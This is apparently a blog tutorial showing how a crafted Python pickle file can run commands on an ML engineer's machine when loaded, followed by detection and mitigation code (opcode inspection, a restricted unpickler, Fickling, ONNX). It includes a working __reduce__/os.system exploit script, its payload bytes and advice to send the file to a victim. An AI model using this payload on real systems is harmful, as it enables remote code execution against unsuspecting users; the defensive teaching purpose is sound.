Phishing Attack Using a Machine Learning Model

I found two members of the ML team transferring files related to training a model:

  • The first was a file of serialized data generated by Python’s pickle module.

  • The second was a Python script that deserializes the first file:

import sys
import base64
import pickle
import numpy as np
from sklearn.feature_extraction.text import CountVectorizer
import keras
input=sys.argv[1]
text = base64.b64decode(input)
file = open("./vector.pickel",'rb')
vectorizer = pickle.load(file)
file.close()
...

The pickle module has to be used with great care:

📌 “Never deserialize data from an untrusted source while using pickle”

Still, teams use it for good reasons:

The use of pickling conserves memory, enables start-and-stop model training, and makes trained models portable (and, thereby, shareable). Pickling is easy to implement, is built into Python without requiring additional dependencies, and supports serialization of custom objects. It’s easy to see why pickling is a popular choice for persistence among Python programmers and ML practitioners.
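
A minimal sketch of the start-and-stop and custom-object points above, assuming a hypothetical `ToyModel` class standing in for a real trained estimator: `pickle.dumps()` captures the object’s state, and `pickle.loads()` rebuilds it so training can resume from the restored copy.

```python
import pickle
from dataclasses import dataclass, field


@dataclass
class ToyModel:
    """Hypothetical stand-in for a trained model: a custom class with learned state."""
    weights: list = field(default_factory=list)
    epochs_trained: int = 0

    def train_one_epoch(self):
        # Pretend to learn something so the state changes between checkpoints.
        self.weights.append(len(self.weights) * 0.5)
        self.epochs_trained += 1


model = ToyModel()
model.train_one_epoch()

# Checkpoint: serialize the object's attributes plus a reference to its class.
blob = pickle.dumps(model)

# Later (or on another machine with the same class importable): restore and resume.
restored = pickle.loads(blob)
restored.train_one_epoch()
print(restored)  # ToyModel(weights=[0.0, 0.5], epochs_trained=2)
```

Note that pickle stores only a reference to the class (its module and name), not the class’s code, so the class must be importable wherever the file is loaded. That “import something by name, then call it” mechanism is what the attack in this post abuses.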

Anyway,

The Attack:

Pre-trained models are typically treated as “free” byproducts of ML since they allow the valuable intellectual property like algorithms and corpora that produced the model to remain private. This gives many people the confidence to share their models over the internet, particularly for reusable computer vision and natural language processing classifiers. Websites like **PyTorch Hub** facilitate model sharing, and some libraries even provide APIs to download models from GitHub repositories automatically.

The attack comes down to crafting a malicious pickle file that the ML engineer will load on their machine with Python’s pickle module.
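
The trick relies on `__reduce__`. When pickle serializes an object, it asks the object how to rebuild itself through `__reduce__`, which may return any importable callable plus a tuple of arguments; `pickle.loads()` then simply calls that callable. The sketch below uses a hypothetical `Harmless` class and the built-in `divmod` as a benign stand-in for `os.system`, so it is safe to run:

```python
import pickle


class Harmless:
    """Hypothetical class that uses __reduce__ the same way a payload would."""

    def __reduce__(self):
        # "To rebuild me, call divmod(17, 5)". A malicious pickle names
        # os.system and a shell command here instead.
        return divmod, (17, 5)


data = pickle.dumps(Harmless())

# Loading never touches the Harmless class: the pickle only stores a
# reference to builtins.divmod and its arguments, and loads() calls it.
restored = pickle.loads(data)
print(restored)                        # (3, 2)
print(isinstance(restored, Harmless))  # False
```

Because the loaded bytes only reference the callable by name, the victim does not need the attacker’s class at all; any callable importable on their machine can be invoked.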

Here is the code I used to create the malicious payload that goes into the pickle file:

For more technical details and why I used this script, read this.

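import pickle
import os

class RCE:
    def __reduce__(self):
        # pickle calls __reduce__ while serializing; it returns a callable plus its
        # arguments, and pickle.load() on the victim's side calls os.system(cmd).
        cmd = input()  # Enter a command to be executed on the victim's device
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    print(pickled)  # the raw bytes of the malicious pickle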

Example:

╭─root@ubuntu ~/Test 
╰─# python3 exploit.py
whoami
#Output:
b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.'

Save these bytes as the pickle file (here, vector.pickel) and send it to the victim. When they load it with pickle, the command is executed on their device.
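
The payload can also be taken apart without running it: the standard library’s `pickletools.genops()` decodes the opcode stream but never imports or calls anything. The sketch below is a rough triage heuristic, not a replacement for a proper analyzer; the helper `imported_globals` is hypothetical and assumes the module and attribute names are pushed as fresh strings right before `STACK_GLOBAL`, so memoized references could slip past it. Legitimate model pickles also import globals, so the point is to review which ones appear.

```python
import pickle
import pickletools

# Payload printed by exploit.py above (command: whoami). Parsing it is safe:
# pickletools only decodes opcodes and never imports or calls anything.
payload = (b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94'
           b'\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.')


def imported_globals(data):
    """Hypothetical helper: list 'module.name' globals a pickle would import.

    Rough heuristic: for STACK_GLOBAL it assumes the module and attribute
    names were the two most recent string literals, so memoized (BINGET)
    references can slip past it.
    """
    found, strings = [], []
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # Protocols 0-3: the argument is "module name" in one string.
            module, name = arg.split(" ", 1)
            found.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL" and len(strings) >= 2:
            # Protocol 4+: module and name are taken from the stack.
            found.append(f"{strings[-2]}.{strings[-1]}")
        elif isinstance(arg, str):
            strings.append(arg)
    return found


names = [op.name for op, _arg, _pos in pickletools.genops(payload)]
print(names)
print(imported_globals(payload))  # ['posix.system']

# A plain data pickle imports nothing.
benign = pickle.dumps({"weights": [0.1, 0.2]})
print(imported_globals(benign))   # []
```

`STACK_GLOBAL` imports `posix.system` (what `os.system` resolves to on Linux) and `REDUCE` calls it with the tuple `('whoami',)`, which is exactly what `pickle.load()` does on the victim’s side.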

Victim view:

Suppose the victim runs a script like the one below to load the pickle file I just sent, without inspecting it first. The command is executed on their device:

#import sys
#import base64
import pickle
#import numpy as np
#from sklearn.feature_extraction.text import CountVectorizer
#import keras
#input=sys.argv[1]
#text = base64.b64decode(input)
file = open("./vector.pickel",'rb')
vectorizer = pickle.load(file)
file.close()
file = open("Logistic_Model.sav",'rb')
Liner_model = pickle.load(file)
file.close()
NN_model=keras.models.load_model("nn_model.h5")
encodings =vectorizer.transform([text]).toarray()
print("Liner Model Prediction {0}".format(Liner_model.predict(encodings)[0]))
print("NN Model Prediction {0}".format(np.round(NN_model.predict(encodings)[0])))

This script is part of the team’s ML work (it seems to make predictions), but running it against the malicious pickle file that contains my payload makes the system execute the command:

 cat vector.pickel
��!�posix��system����whoami���R�. 
 python3 predict.py
iradi
#Traceback (most recent call last):
#  File "predict.py", line 12, in <module>
#    file = open("Logistic_Model.sav",'rb')
#FileNotFoundError: [Errno 2] No such file or directory: 'Logistic_Model.sav'
 sudo python3 predict.py
root
#/usr/lib/python3/dist-packages/requests/__init__.py:89: RequestsDependencyWarning: urllib3 (1.26.9) or chardet (3.0.4) doesn't match a supported version!
#  warnings.warn("urllib3 ({}) or chardet ({}) doesn't match a supported "
#Traceback (most recent call last):
#  File "predict.py", line 12, in <module>
#    file = open("Logistic_Model.sav",'rb')
#FileNotFoundError: [Errno 2] No such file or directory: 'Logistic_Model.sav'

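That is the output: whoami printed iradi, and root when the script was run with sudo. A real attacker would keep everything in the background and run the command “blind”, so that no output reaches the victim.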

How to stay safe:

  • Use Fickling: it has its own implementation of the Pickle Virtual Machine (PM), and it is safe to run on potentially malicious files because it executes the pickle symbolically rather than actually running its code.

  • You can run Fickling’s static analyses to detect certain classes of malicious pickles by passing the --check-safety option.

  • There are also frameworks that avoid pickle for serialization. For example, the Open Neural Network Exchange (ONNX) aims to provide a universal standard for encoding AI models to improve interoperability, and the ONNX specification uses Protocol Buffers (protobuf) to encode model representations.
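
When pickle cannot be avoided, the Python documentation’s “Restricting Globals” pattern limits what a file can import: subclass `pickle.Unpickler` and override `find_class` so that only an explicit allowlist of globals is resolved. A minimal sketch, assuming a hypothetical `SAFE_GLOBALS` allowlist; a real model would need its own classes added, and every entry widens what an attacker can call.

```python
import io
import pickle

# Hypothetical allowlist of (module, name) pairs the loader may import.
# Plain containers, numbers and strings need no globals at all.
SAFE_GLOBALS = {
    ("builtins", "complex"),
    ("builtins", "range"),
}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for every GLOBAL / STACK_GLOBAL opcode, i.e. before any
        # imported callable can be reached by REDUCE.
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data):
    """Like pickle.loads(), but refuses any global outside SAFE_GLOBALS."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Ordinary data still loads.
print(restricted_loads(pickle.dumps({"weights": [0.1, 0.2], "bias": 0.5})))

# The payload from exploit.py (command: whoami) is rejected before system() runs.
payload = (b'\x80\x04\x95!\x00\x00\x00\x00\x00\x00\x00\x8c\x05posix\x94'
           b'\x8c\x06system\x94\x93\x94\x8c\x06whoami\x94\x85\x94R\x94.')
blocked = None
try:
    restricted_loads(payload)
except pickle.UnpicklingError as exc:
    blocked = str(exc)
print("blocked:", blocked)  # blocked: global 'posix.system' is forbidden
```

An allowlist is used rather than a blocklist because there are many ways to reach code execution through importable callables, and a blocklist only stops the ones you thought of.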
